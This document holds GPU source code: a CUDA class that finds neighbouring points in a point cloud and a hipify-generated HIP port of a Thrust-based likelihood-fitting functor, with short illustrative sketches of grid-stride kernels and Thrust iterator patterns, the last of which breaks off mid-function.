/** * @file cudaNeighbours.cpp * @author Luca Bartoli([email protected]) * @brief Cuda class impelentation for get neighbours points for each point * @version 1.0 * @date 2019-08-28 * * @copyright Copyright (c) 2019 * */ #include <src/cudaNeighbours/cudaNeighbours.h> __global__ void kernel(float *d_points, int* d_neighbours, int n, int neighbours, float eps, int MAXNEIGHB){ int id = threadIdx.x + blockIdx.x * blockDim.x; while(id < n){ int i = 0; int s = id; for(int c = 0; c < neighbours/2; c++){ s = (s+n-1) % n; float a = d_points[id*4]; float b = d_points[s*4]; float a_b = a - b; float c = d_points[id*4+1]; float d = d_points[s*4+1]; float c_d = c - d; if( (a_b*a_b + c_d*c_d) < eps){ d_neighbours[MAXNEIGHB * id + i] = s; i++; } if( i > MAXNEIGHB/2-1){ break; } } s = id; for(int c = 0; c < neighbours/2; c++){ s = (s+1) % n; float a = d_points[id*4]; float b = d_points[s*4]; float a_b = a - b; float c = d_points[id*4+1]; float d = d_points[s*4+1]; float c_d = c - d; if( (a_b*a_b + c_d*c_d) < eps){ d_neighbours[MAXNEIGHB * id + i] = s; i++; } if(i > MAXNEIGHB-2){ break; } } d_neighbours[MAXNEIGHB * id + i] = -1; id += blockDim.x * gridDim.x; } } bool cudaNeighbours::init(int neighbours, float eps, int MAXNEIGHB,int cudaDevice){ //Get device propriety /////////////////////////////////////////////////////////// int deviceCount; cudaGetDeviceCount(&deviceCount); if(deviceCount <= cudaDevice){ std::cerr<<"cudaFiltering: Wrong GPU device ID\n"; exit(-1); } cudaSetDevice(cudaDevice); cudaDeviceProp deviceProp; cudaGetDeviceProperties(&deviceProp,cudaDevice); this->sm = deviceProp.multiProcessorCount; std::cout<<"Using: "<<deviceProp.name<<"\n\n"; ////////////////////////////////////////////////////////// this->eps = eps; this->neighbours = neighbours; this->MAXNEIGHB = MAXNEIGHB; #ifndef COMPILE_FOR_NVIDIA_TX2 //malloc on host (pinned memory) HANDLE_ERROR( cudaMallocHost((void**)&h_neighbours, MAXNEIGHB * MAXPOINTS * sizeof(int)) ); #else #pragma message "Select compilation for TX2" h_neighbours = new int[MAXNEIGHB * MAXPOINTS]; #endif HANDLE_ERROR( cudaMalloc((void**)&d_points,MAXPOINTS * sizeof(float) * 4) ); HANDLE_ERROR( cudaMalloc((void**)&d_neighbours,MAXNEIGHB * MAXPOINTS * sizeof(int)) ); return true; } void cudaNeighbours::calculateNeighbours(float *mat, int n){ HANDLE_ERROR( cudaMemset(d_neighbours,0,MAXNEIGHB * MAXPOINTS * sizeof(int)) ); HANDLE_ERROR( cudaMemcpy(d_points, mat, n * sizeof(float) * 4, cudaMemcpyHostToDevice) ); kernel<<<this->sm,1024>>>(d_points, d_neighbours, n, this->neighbours, this->eps, MAXNEIGHB); HANDLE_ERROR( cudaDeviceSynchronize() ); HANDLE_ERROR( cudaMemcpy(h_neighbours, d_neighbours , MAXNEIGHB * n * sizeof(int), cudaMemcpyDeviceToHost) ); } void cudaNeighbours::close(){ cudaFree(d_points); #ifndef COMPILE_FOR_NVIDIA_TX2 cudaFree(d_neighbours); #else delete [] h_neighbours; #endif cudaFree(h_neighbours); }
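kernel() above covers all points with a grid-stride loop, and calculateNeighbours() sizes the launch grid by the device's multiprocessor count. A self-contained sketch of the same pattern with a hypothetical squareAll kernel:

// Illustrative sketch only (not part of the original file).
#include <cuda_runtime.h>

// Each thread starts at its global id and strides by the total number of
// launched threads until the whole range [0, n) is covered.
__global__ void squareAll(float* data, int n) {
  int id = threadIdx.x + blockIdx.x * blockDim.x;
  while (id < n) {
    data[id] = data[id] * data[id];
    id += blockDim.x * gridDim.x;
  }
}

int main() {
  int device = 0;
  cudaSetDevice(device);
  cudaDeviceProp prop;
  cudaGetDeviceProperties(&prop, device);
  const int sm = prop.multiProcessorCount;  // grid sized by SM count, as in calculateNeighbours()
  const int n = 1 << 22;
  float* d_data = 0;
  cudaMalloc((void**)&d_data, n * sizeof(float));
  cudaMemset(d_data, 0, n * sizeof(float));
  squareAll<<<sm, 1024>>>(d_data, n);
  cudaDeviceSynchronize();
  cudaFree(d_data);
  return 0;
}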
e82d1d33266c5e3b8b740e413f75b35ab8018ee4.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "../GlobalCudaDefines.hh" #include "ThrustPdfFunctor.hh" #include "thrust/sequence.h" #include "thrust/iterator/constant_iterator.h" //#ifdef CUDAPRINT #include "cuPrintf.hip" #include <fstream> //#endif // These variables are either function-pointer related (thus specific to this implementation) // or constrained to be in the CUDAglob translation unit by nvcc limitations; otherwise they // would be in FunctorBase. // Device-side, translation-unit constrained. __constant__ fptype hipArray[maxParams]; // Holds device-side fit parameters. __constant__ unsigned int paramIndices[maxParams]; // Holds functor-specific indices into hipArray. Also overloaded to hold integer constants (ie parameters that cannot vary.) __constant__ fptype functorConstants[maxParams]; // Holds non-integer constants. Notice that first entry is number of events. __constant__ fptype normalisationFactors[maxParams]; // For debugging __constant__ int callnumber; __constant__ int gpuDebug; __constant__ unsigned int debugParamIndex; __device__ int internalDebug1 = -1; __device__ int internalDebug2 = -1; __device__ int internalDebug3 = -1; int cpuDebug = 0; // Function-pointer related. __device__ void* device_function_table[200]; // Not clear why this cannot be __constant__, but it causes crashes to declare it so. void* host_function_table[200]; unsigned int num_device_functions = 0; #ifdef OMP_ON // Make functionAddressToDevideIndexMap and array of maps indexed by thread id since // I get the following compiler error if I try to make it threadprivate. // "functionAddressToDeviceIndexMap declared threadprivate after first use" typedef std::map<void*, int> tMapType; tMapType functionAddressToDeviceIndexMap[MAX_THREADS]; #pragma omp threadprivate(host_function_table, num_device_functions) fptype gSum; fptype sums[MAX_THREADS]; double gLognorm; double lognorms[MAX_THREADS]; #else std::map<void*, int> functionAddressToDeviceIndexMap; #endif #define cutilSafeCall(err) __cudaSafeCall(err, __FILE__, __LINE__) // For use in debugging memory issues void printMemoryStatus (std::string file, int line) { size_t memfree = 0; size_t memtotal = 0; hipDeviceSynchronize(); hipMemGetInfo(&memfree, &memtotal); hipDeviceSynchronize(); std::cout << "Memory status " << file << " " << line << " Free " << memfree << " Total " << memtotal << " Used " << (memtotal - memfree) << std::endl; } #include <execinfo.h> void* stackarray[10]; void abortWithCudaPrintFlush (std::string file, int line, std::string reason, const FunctorBase* pdf = 0) { #ifdef CUDAPRINT cudaPrintfDisplay(stdout, true); cudaPrintfEnd(); #endif std::cout << "Abort called from " << file << " line " << line << " due to " << reason << std::endl; if (pdf) { std::set<Variable*> pars; pdf->getParameters(pars); std::cout << "Parameters of " << pdf->getName() << " : \n"; for (std::set<Variable*>::iterator v = pars.begin(); v != pars.end(); ++v) { if (0 > (*v)->index) continue; std::cout << " " << (*v)->name << " (" << (*v)->index << ") :\t" << host_params[(*v)->index] << std::endl; } } std::cout << "Parameters (" << totalParams << ") :\n"; for (int i = 0; i < totalParams; ++i) { std::cout << host_params[i] << " "; } std::cout << std::endl; // get void* pointers for all entries on the stack size_t size = backtrace(stackarray, 10); // print out all the frames to stderr backtrace_symbols_fd(stackarray, size, 2); exit(1); } void __cudaSafeCall (hipError_t err, const char* file, int line) { if 
(hipSuccess != err) { std::cout << "Error code " << err << " (" << hipGetErrorString(err) << ") at " << file << ", " << line << std::endl; exit(1); } } __device__ fptype calculateEval (fptype rawPdf, fptype* evtVal, unsigned int par) { // Just return the raw PDF value, for use in (eg) normalisation. return rawPdf; } __device__ fptype calculateNLL (fptype rawPdf, fptype* evtVal, unsigned int par) { //if ((10 > callnumber) && (threadIdx.x < 10) && (blockIdx.x == 0)) cuPrintf("calculateNll %i %f %f %f\n", callnumber, rawPdf, normalisationFactors[par], rawPdf*normalisationFactors[par]); rawPdf *= normalisationFactors[par]; return rawPdf > 0 ? -LOG(rawPdf) : 0; } __device__ fptype calculateProb (fptype rawPdf, fptype* evtVal, unsigned int par) { // Return probability, ie normalised PDF value. return rawPdf * normalisationFactors[par]; } __device__ fptype calculateBinAvg (fptype rawPdf, fptype* evtVal, unsigned int par) { rawPdf *= normalisationFactors[par]; rawPdf *= evtVal[1]; // Bin volume // Log-likelihood of numEvents with expectation of exp is (-exp + numEvents*ln(exp) - ln(numEvents!)). // The last is constant, so we drop it; and then multiply by minus one to get the negative log-likelihood. if (rawPdf > 0) { fptype expEvents = functorConstants[0]*rawPdf; return (expEvents - evtVal[0]*log(expEvents)); } return 0; } __device__ fptype calculateBinWithError (fptype rawPdf, fptype* evtVal, unsigned int par) { // In this case interpret the rawPdf as just a number, not a number of events. // Do not divide by integral over phase space, do not multiply by bin volume, // and do not collect 200 dollars. evtVal should have the structure (bin entry, bin error). //printf("[%i, %i] ((%f - %f) / %f)^2 = %f\n", blockIdx.x, threadIdx.x, rawPdf, evtVal[0], evtVal[1], POW((rawPdf - evtVal[0]) / evtVal[1], 2)); rawPdf -= evtVal[0]; // Subtract observed value. rawPdf /= evtVal[1]; // Divide by error. rawPdf *= rawPdf; return rawPdf; } __device__ fptype calculateChisq (fptype rawPdf, fptype* evtVal, unsigned int par) { rawPdf *= normalisationFactors[par]; rawPdf *= evtVal[1]; // Bin volume return pow(rawPdf * functorConstants[0] - evtVal[0], 2) / (evtVal[0] > 1 ? evtVal[0] : 1); } __device__ device_metric_ptr ptr_to_Eval = calculateEval; __device__ device_metric_ptr ptr_to_NLL = calculateNLL; __device__ device_metric_ptr ptr_to_Prob = calculateProb; __device__ device_metric_ptr ptr_to_BinAvg = calculateBinAvg; __device__ device_metric_ptr ptr_to_BinWithError = calculateBinWithError; __device__ device_metric_ptr ptr_to_Chisq = calculateChisq; void* host_fcn_ptr = 0; void* getMetricPointer (std::string name) { #define CHOOSE_PTR(ptrname) if (name == #ptrname) hipMemcpyFromSymbol((void**) &host_fcn_ptr, ptrname, sizeof(void*)) host_fcn_ptr = 0; CHOOSE_PTR(ptr_to_Eval); CHOOSE_PTR(ptr_to_NLL); CHOOSE_PTR(ptr_to_Prob); CHOOSE_PTR(ptr_to_BinAvg); CHOOSE_PTR(ptr_to_BinWithError); CHOOSE_PTR(ptr_to_Chisq); assert(host_fcn_ptr); return host_fcn_ptr; #undef CHOOSE_PTR } ThrustPdfFunctor::ThrustPdfFunctor (Variable* x, std::string n) : FunctorBase(x, n) , logger(0) {} __host__ int ThrustPdfFunctor::findFunctionIdx (void* dev_functionPtr) { // Code specific to function-pointer implementation #ifdef OMP_ON int tid = omp_get_thread_num(); std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap[tid].find(dev_functionPtr); // Use find instead of [] to avoid returning 0 if the index doesn't exist. 
if (localPos != functionAddressToDeviceIndexMap[tid].end()) { return (*localPos).second; } #else std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap.find(dev_functionPtr); if (localPos != functionAddressToDeviceIndexMap.end()) { return (*localPos).second; } #endif int fIdx = num_device_functions; host_function_table[num_device_functions] = dev_functionPtr; #ifdef OMP_ON functionAddressToDeviceIndexMap[tid][dev_functionPtr] = num_device_functions; #else functionAddressToDeviceIndexMap[dev_functionPtr] = num_device_functions; #endif num_device_functions++; cutilSafeCall(hipMemcpyToSymbol(device_function_table, host_function_table, num_device_functions*sizeof(void*))); return fIdx; } __host__ void ThrustPdfFunctor::initialise (std::vector<unsigned int> pindices, void* dev_functionPtr) { if (!fitControl) setFitControl(new UnbinnedNllFit()); // MetricTaker must be created after FunctorBase initialisation is done. FunctorBase::initialiseIndices(pindices); functionIdx = findFunctionIdx(dev_functionPtr); setMetrics(); } __host__ void ThrustPdfFunctor::setDebugMask (int mask, bool setSpecific) const { cpuDebug = mask; hipMemcpyToSymbol(gpuDebug, &cpuDebug, sizeof(int), 0, hipMemcpyHostToDevice); if (setSpecific) hipMemcpyToSymbol(debugParamIndex, &parameters, sizeof(unsigned int), 0, hipMemcpyHostToDevice); } __host__ void ThrustPdfFunctor::setMetrics () { if (logger) delete logger; logger = new MetricTaker(this, getMetricPointer(fitControl->getMetric())); } __host__ double ThrustPdfFunctor::sumOfNll (int numVars) const { static thrust::plus<double> cudaPlus; thrust::constant_iterator<int> eventSize(numVars); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); double dummy = 0; //if (host_callnumber >= 2) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " debug abort", this); #ifdef OMP_ON unsigned int thFirstEntry, thLastEntry; int tid, nthreads; int j; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); thFirstEntry = tid*(numEntries)/nthreads; thLastEntry = (tid+1)*(numEntries)/nthreads; // std::cout << tid << ": " << numEntries << " " << thFirstEntry << " " << thLastEntry << std::endl; // std::cout << "Extended term: " << numVars << " " << numEntries << " " << numEvents << std::endl; thrust::counting_iterator<int> eventIndex(0); lognorms[tid] = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thFirstEntry, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thLastEntry, arrayAddress, eventSize)), *logger, dummy, cudaPlus); #pragma omp barrier if (tid == 0) { gLognorm = 0; for (j = 0; j < nthreads; j++) gLognorm += lognorms[j]; } #pragma omp barrier // std::cout << tid << ": Full NLL: " << ret << " " << gLognorm << " " << lognorm << std::endl; return gLognorm; #else thrust::counting_iterator<int> eventIndex(0); return thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), *logger, dummy, cudaPlus); #endif } __host__ double ThrustPdfFunctor::calculateNLL () const { //if (cpuDebug & 1) std::cout << getName() << " entering calculateNLL" << std::endl; //int oldMask = cpuDebug; //if (0 == host_callnumber) setDebugMask(0, false); normalise(); //if ((0 == host_callnumber) && (1 == oldMask)) setDebugMask(1, false); /* if (cpuDebug & 1) { std::cout << "Norm factors: "; for (int i = 0; i < totalParams; ++i) std::cout << host_normalisation[i] 
<< " "; std::cout << std::endl; } */ hipMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, hipMemcpyHostToDevice); hipDeviceSynchronize(); // Ensure normalisation integrals are finished int numVars = observables.size(); if (fitControl->binnedFit()) { numVars += 2; numVars *= -1; } fptype ret = sumOfNll(numVars); if (0 == ret) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " zero NLL", this); //if (cpuDebug & 1) std::cout << "Full NLL " << host_callnumber << " : " << 2*ret << std::endl; //setDebugMask(0); //if ((cpuDebug & 1) && (host_callnumber >= 1)) abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " debug abort", this); return 2*ret; } __host__ void ThrustPdfFunctor::evaluateAtPoints (Variable* var, std::vector<fptype>& res) { // NB: This does not project correctly in multidimensional datasets, because all observables // other than 'var' will have, for every event, whatever value they happened to get set to last // time they were set. This is likely to be the value from the last event in whatever dataset // you were fitting to, but at any rate you don't get the probability-weighted integral over // the other observables. copyParams(); normalise(); hipMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, hipMemcpyHostToDevice); UnbinnedDataSet tempdata(observables); double step = (var->upperlimit - var->lowerlimit) / var->numbins; for (int i = 0; i < var->numbins; ++i) { var->value = var->lowerlimit + (i+0.5)*step; tempdata.addEvent(); } setData(&tempdata); thrust::counting_iterator<int> eventIndex(0); thrust::constant_iterator<int> eventSize(observables.size()); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::device_vector<fptype> results(var->numbins); MetricTaker evalor(this, getMetricPointer("ptr_to_Eval")); #ifdef OMP_ON unsigned int thFirstEntry, thLastEntry; int tid, nthreads; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); // use var->numbins or numEntries here? 
thFirstEntry = tid*(var->numbins)/nthreads; thLastEntry = (tid+1)*(var->numbins)/nthreads; thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex+thFirstEntry, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + thLastEntry, arrayAddress, eventSize)), results.begin()+thFirstEntry, evalor); #pragma omp barrier #else thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), results.begin(), evalor); #endif thrust::host_vector<fptype> h_results = results; res.clear(); res.resize(var->numbins); for (int i = 0; i < var->numbins; ++i) { res[i] = h_results[i] * host_normalisation[parameters]; } } __host__ void ThrustPdfFunctor::evaluateAtPoints (std::vector<fptype>& points) const { /* std::set<Variable*> vars; getParameters(vars); unsigned int maxIndex = 0; for (std::set<Variable*>::iterator i = vars.begin(); i != vars.end(); ++i) { if ((*i)->getIndex() < maxIndex) continue; maxIndex = (*i)->getIndex(); } std::vector<double> params; params.resize(maxIndex+1); for (std::set<Variable*>::iterator i = vars.begin(); i != vars.end(); ++i) { if (0 > (*i)->getIndex()) continue; params[(*i)->getIndex()] = (*i)->value; } copyParams(params); thrust::device_vector<fptype> d_vec = points; normalise(); hipMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, hipMemcpyHostToDevice); thrust::transform(d_vec.begin(), d_vec.end(), d_vec.begin(), *evalor); thrust::host_vector<fptype> h_vec = d_vec; for (unsigned int i = 0; i < points.size(); ++i) points[i] = h_vec[i]; */ } __host__ void ThrustPdfFunctor::scan (Variable* var, std::vector<fptype>& values) { fptype step = var->upperlimit; step -= var->lowerlimit; step /= var->numbins; values.clear(); for (fptype v = var->lowerlimit + 0.5*step; v < var->upperlimit; v += step) { var->value = v; copyParams(); fptype curr = calculateNLL(); values.push_back(curr); } } __host__ void ThrustPdfFunctor::setParameterConstantness (bool constant) { std::set<Variable*> pars; getParameters(pars); for (std::set<Variable*>::iterator p = pars.begin(); p != pars.end(); ++p) { (*p)->fixed = constant; } } __host__ fptype ThrustPdfFunctor::getValue () { // Returns the value of the PDF at a single point. 
// Execute redundantly in all threads for OpenMP multiGPU case copyParams(); normalise(); hipMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, hipMemcpyHostToDevice); UnbinnedDataSet point(observables); point.addEvent(); setData(&point); thrust::counting_iterator<int> eventIndex(0); thrust::constant_iterator<int> eventSize(observables.size()); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::device_vector<fptype> results(1); MetricTaker evalor(this, getMetricPointer("ptr_to_Eval")); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + 1, arrayAddress, eventSize)), results.begin(), evalor); return results[0]; } __host__ fptype ThrustPdfFunctor::normalise () const { //if (cpuDebug & 1) std::cout << "Normalising " << getName() << " " << hasAnalyticIntegral() << " " << normRanges << std::endl; if (!fitControl->metricIsPdf()) { host_normalisation[parameters] = 1.0; return 1.0; } fptype ret = 1; if (hasAnalyticIntegral()) { for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { // Loop goes only over observables of this PDF. //std::cout << "Analytically integrating " << getName() << " over " << (*v)->name << std::endl; ret *= integrate((*v)->lowerlimit, (*v)->upperlimit); } host_normalisation[parameters] = 1.0/ret; //if (cpuDebug & 1) std::cout << "Analytic integral of " << getName() << " is " << ret << std::endl; return ret; } int totalBins = 1; for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { ret *= ((*v)->upperlimit - (*v)->lowerlimit); totalBins *= (integrationBins > 0 ? integrationBins : (*v)->numbins); //if (cpuDebug & 1) std::cout << "Total bins " << totalBins << " due to " << (*v)->name << " " << integrationBins << " " << (*v)->numbins << std::endl; } ret /= totalBins; fptype dummy = 0; static thrust::plus<fptype> cudaPlus; thrust::constant_iterator<fptype*> arrayAddress(normRanges); thrust::constant_iterator<int> eventSize(observables.size()); thrust::counting_iterator<int> binIndex(0); #ifdef OMP_ON unsigned int thFirstBin, thLastBin; int tid, nthreads; int j; tid = omp_get_thread_num(); nthreads = omp_get_num_threads(); thFirstBin = tid*(totalBins)/nthreads; thLastBin = (tid+1)*(totalBins)/nthreads; //std::cout << "totalBins = " << totalBins << " thFirstBin = " << thFirstBin << " thLastBin = " << thLastBin << std::endl; sums[tid] = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(binIndex + thFirstBin, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + thLastBin, eventSize, arrayAddress)), *logger, dummy, cudaPlus); hipDeviceSynchronize(); // Ensure logger is done #pragma omp barrier if (tid == 0) { gSum = 0; for (j=0; j<nthreads; j++) gSum += sums[j]; } // std::cout << tid << ": sum = " << sum << " gSum = " << gSum << std::endl; #pragma omp barrier if (isnan(gSum)) { abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " NaN in normalisation", this); } else if (0 == gSum) { abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero in normalisation", this); } ret *= gSum; #else fptype sum = thrust::transform_reduce(thrust::make_zip_iterator(thrust::make_tuple(binIndex, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + totalBins, eventSize, arrayAddress)), *logger, dummy, cudaPlus); if (isnan(sum)) { abortWithCudaPrintFlush(__FILE__, __LINE__, getName() + " NaN in normalisation", this); } else if (0 == sum) { 
abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero in normalisation", this); } //if (cpuDebug & 1) std::cout << getName() << " integral is " << ret << " " << sum << " " << (ret*sum) << " " << (1.0/(ret*sum)) << std::endl; ret *= sum; #endif if (0 == ret) abortWithCudaPrintFlush(__FILE__, __LINE__, "Zero integral"); host_normalisation[parameters] = 1.0/ret; return (fptype) ret; } // Notice that operators are distinguished by the order of the operands, // and not otherwise! It's up to the user to make his tuples correctly. // Main operator: Calls the PDF to get a predicted value, then the metric // to get the goodness-of-prediction number which is returned to MINUIT. __device__ fptype MetricTaker::operator () (thrust::tuple<int, fptype*, int> t) const { int eventIndex = thrust::get<0>(t); int eventSize = thrust::get<2>(t); fptype* eventAddress = thrust::get<1>(t) + (eventIndex * abs(eventSize)); // Causes stack size to be statically undeterminable. fptype ret = (*(reinterpret_cast<device_function_ptr>(device_function_table[functionIdx])))(eventAddress, hipArray, paramIndices+parameters); // Notice assumption here! For unbinned fits the 'eventAddress' pointer won't be used // in the metric, so it doesn't matter what it is. For binned fits it is assumed that // the structure of the event is (obs1 obs2... binentry binvolume), so that the array // passed to the metric consists of (binentry binvolume); unless the data has // user-provided errors, in which case binvolume is replaced by binError. ret = (*(reinterpret_cast<device_metric_ptr>(device_function_table[metricIndex])))(ret, eventAddress + (abs(eventSize)-2), parameters); return ret; } // Operator for binned evaluation, no metric. // Used in normalisation. #define MAX_NUM_OBSERVABLES 5 __device__ fptype MetricTaker::operator () (thrust::tuple<int, int, fptype*> t) const { // Bin index, event size, base address [lower, upper, numbins] int evtSize = thrust::get<1>(t); assert(evtSize <= MAX_NUM_OBSERVABLES); int binNumber = thrust::get<0>(t); // Do not understand why this cannot be declared __shared__. Dynamically allocating shared memory is apparently complicated. //fptype* binCenters = (fptype*) malloc(evtSize * sizeof(fptype)); __shared__ fptype binCenters[1024*MAX_NUM_OBSERVABLES]; // To convert global bin number to (x,y,z...) coordinates: For each dimension, take the mod // with the number of bins in that dimension. Then divide by the number of bins, in effect // collapsing so the grid has one fewer dimension. Rinse and repeat. unsigned int* indices = paramIndices + parameters; for (int i = 0; i < evtSize; ++i) { fptype lowerBound = thrust::get<2>(t)[3*i+0]; fptype upperBound = thrust::get<2>(t)[3*i+1]; int numBins = (int) FLOOR(thrust::get<2>(t)[3*i+2] + 0.5); int localBin = binNumber % numBins; fptype x = upperBound - lowerBound; x /= numBins; x *= (localBin + 0.5); x += lowerBound; binCenters[indices[indices[0] + 2 + i]+threadIdx.x*MAX_NUM_OBSERVABLES] = x; binNumber /= numBins; //if (gpuDebug & 1) //if ((gpuDebug & 1) && (0 == threadIdx.x) && (0 == blockIdx.x)) //printf("[%i, %i] Bins: %i %i %i %f %f %f %f %i\n", blockIdx.x, threadIdx.x, binNumber, numBins, localBin, x, lowerBound, upperBound, thrust::get<2>(t)[3*i+2], indices[indices[0] + 2 + i]); //printf("Bins: %i %i %i %f %f\n", i, indices[indices[0] + 2 + i]+threadIdx.x*MAX_NUM_OBSERVABLES, indices[indices[0] + 2 + i], x, binCenters[threadIdx.x*MAX_NUM_OBSERVABLES]); } // Causes stack size to be statically undeterminable. 
fptype ret = (*(reinterpret_cast<device_function_ptr>(device_function_table[functionIdx])))(binCenters+threadIdx.x*MAX_NUM_OBSERVABLES, hipArray, indices); //if (gpuDebug & 1) printf("[%i, %i] Binned eval: %f %f\n", blockIdx.x, threadIdx.x, binCenters[threadIdx.x*4], ret); return ret; } __host__ void ThrustPdfFunctor::getCompProbsAtDataPoints (std::vector<std::vector<fptype> >& values) { //cpuDebug = 1; copyParams(); double overall = normalise(); hipMemcpyToSymbol(normalisationFactors, host_normalisation, totalParams*sizeof(fptype), 0, hipMemcpyHostToDevice); //setDebugMask(1); int numVars = observables.size(); if (fitControl->binnedFit()) { numVars += 2; numVars *= -1; } thrust::device_vector<fptype> results(numEntries); thrust::constant_iterator<int> eventSize(numVars); thrust::constant_iterator<fptype*> arrayAddress(cudaDataArray); thrust::counting_iterator<int> eventIndex(0); MetricTaker evalor(this, getMetricPointer("ptr_to_Prob")); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(eventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(eventIndex + numEntries, arrayAddress, eventSize)), results.begin(), evalor); //setDebugMask(0); values.clear(); values.resize(components.size() + 1); thrust::host_vector<fptype> host_results = results; //std::cout << "Overall: " << overall << " " << host_normalisation[getParameterIndex()] << " " << host_results[0] << " " << numVars << " " << numEntries << " " << host_results.size() << std::endl; for (unsigned int i = 0; i < host_results.size(); ++i) { values[0].push_back(host_results[i]); } for (unsigned int i = 0; i < components.size(); ++i) { MetricTaker compevalor(components[i], getMetricPointer("ptr_to_Prob")); thrust::counting_iterator<int> ceventIndex(0); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(ceventIndex, arrayAddress, eventSize)), thrust::make_zip_iterator(thrust::make_tuple(ceventIndex + numEntries, arrayAddress, eventSize)), results.begin(), compevalor); host_results = results; //std::cout << "Normalisation " << components[i]->getName() << ": " << host_results[0] << ", " << host_normalisation[components[i]->getParameterIndex()] << std::endl; for (unsigned int j = 0; j < host_results.size(); ++j) { values[1 + i].push_back(host_results[j]); } } } // still need to add OpenMP/multi-GPU code here __host__ void ThrustPdfFunctor::transformGrid (fptype* host_output) { generateNormRange(); //normalise(); int totalBins = 1; for (obsConstIter v = obsCBegin(); v != obsCEnd(); ++v) { totalBins *= (*v)->numbins; } thrust::constant_iterator<fptype*> arrayAddress(normRanges); thrust::constant_iterator<int> eventSize(observables.size()); thrust::counting_iterator<int> binIndex(0); thrust::device_vector<fptype> d_vec; d_vec.resize(totalBins); thrust::transform(thrust::make_zip_iterator(thrust::make_tuple(binIndex, eventSize, arrayAddress)), thrust::make_zip_iterator(thrust::make_tuple(binIndex + totalBins, eventSize, arrayAddress)), d_vec.begin(), *logger); thrust::host_vector<fptype> h_vec = d_vec; for (unsigned int i = 0; i < totalBins; ++i) host_output[i] = h_vec[i]; } MetricTaker::MetricTaker (FunctorBase* dat, void* dev_functionPtr) : metricIndex(0) , functionIdx(dat->getFunctionIndex()) , parameters(dat->getParameterIndex()) { //std::cout << "MetricTaker constructor with " << functionIdx << std::endl; #ifdef OMP_ON int tid = omp_get_thread_num(); std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap[tid].find(dev_functionPtr); // Use find instead of [] to avoid 
returning 0 if the index doesn't exist. if (localPos != functionAddressToDeviceIndexMap[tid].end()) { metricIndex = (*localPos).second; } #else std::map<void*, int>::iterator localPos = functionAddressToDeviceIndexMap.find(dev_functionPtr); if (localPos != functionAddressToDeviceIndexMap.end()) { metricIndex = (*localPos).second; } #endif else { metricIndex = num_device_functions; host_function_table[num_device_functions] = dev_functionPtr; #ifdef OMP_ON functionAddressToDeviceIndexMap[tid][dev_functionPtr] = num_device_functions; #else functionAddressToDeviceIndexMap[dev_functionPtr] = num_device_functions; #endif num_device_functions++; cutilSafeCall(hipMemcpyToSymbol(device_function_table, host_function_table, num_device_functions*sizeof(void*))); } } MetricTaker::MetricTaker (int fIdx, int pIdx) : metricIndex(0) , functionIdx(fIdx) , parameters(pIdx) { // This constructor should only be used for binned evaluation, ie for integrals. } __host__ void ThrustPdfFunctor::setFitControl (FitControl* const fc, bool takeOwnerShip) { for (unsigned int i = 0; i < components.size(); ++i) { components[i]->setFitControl(fc, false); } if ((fitControl) && (fitControl->getOwner() == this)) { delete fitControl; } fitControl = fc; if (takeOwnerShip) { fitControl->setOwner(this); } setMetrics(); } #include "FunctorBase.cu"
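sumOfNll(), normalise() and getCompProbsAtDataPoints() above all drive the GPU work through thrust::transform_reduce (or thrust::transform) over a zip of a counting_iterator, a constant_iterator holding the data pointer, and a constant_iterator holding the event size, with MetricTaker as the functor. A small self-contained sketch of that iterator/functor plumbing; SumEvent is a hypothetical stand-in for MetricTaker that simply sums each event's observables:

// Illustrative sketch only (not part of the original file).
#include <thrust/device_vector.h>
#include <thrust/iterator/counting_iterator.h>
#include <thrust/iterator/constant_iterator.h>
#include <thrust/iterator/zip_iterator.h>
#include <thrust/transform_reduce.h>
#include <thrust/tuple.h>
#include <thrust/functional.h>
#include <iostream>

// Same call signature shape as MetricTaker::operator():
// (event index, base data pointer, event size) -> one number to be summed.
struct SumEvent {
  __host__ __device__ double operator()(thrust::tuple<int, float*, int> t) const {
    int eventIndex = thrust::get<0>(t);
    int eventSize = thrust::get<2>(t);
    float* eventAddress = thrust::get<1>(t) + eventIndex * eventSize;
    double total = 0;
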